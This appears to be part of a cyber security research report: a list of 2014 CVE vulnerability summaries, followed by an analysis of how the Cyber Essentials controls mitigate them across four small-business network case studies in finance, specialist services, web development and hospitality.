CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
Analysis

The analysis of the data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).
What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in the software and hardware used in each SME network configuration is included.

The full table of the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials security tools, 61 vulnerabilities were partially mitigated and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated
Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, but they will be mitigated once a security fix has been released. Whatever level of security tools is deployed on a network, the security involved in using third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to quickly respond to security breaches, as they become apparent, with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or if there are more suitable and potentially more secure solutions available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In a case such as this, website blacklisting is the only defence against the vulnerabilities.
Not Mitigated - Secure Configuration: Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the cases found, this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For these devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tools on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.
Case Studies
Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.
• SME Network Two represents a specialist SME utilizing an off-site, remotely managed server for administrator services and cloud-based services for employees.
• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.
• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.
SME Network One - Finance Sector
Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services: At the head office site a Windows file server (SAMBA) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and firewall rules have been put in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.
User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.
SME Network Two - Specialist Group
Physical Infrastructure: The second SME participant employs 20-25 staff based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators, via SSH.

Network equipment includes an external Dell PowerEdge server, four TP-Link switch access points and a TP-Link DHCP router.

Figure 7: SME-2 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices run the OSs OS X, Windows XP, Windows 7 & Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: Email, Files & Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owed to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the chosen service provider. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.
SME Network Three - Web Development
Physical Infrastructure: SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge server, one TP-Link switch access point and a TP-Link DHCP router.

Figure 9: SME-3 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices run the OSs OS X, Windows 7 & Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: Email, Files & Database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and Cloud Service Access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and
strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.
SME Network Four - Hotel Services
Figure 11: SME-4 Network

Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services, including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

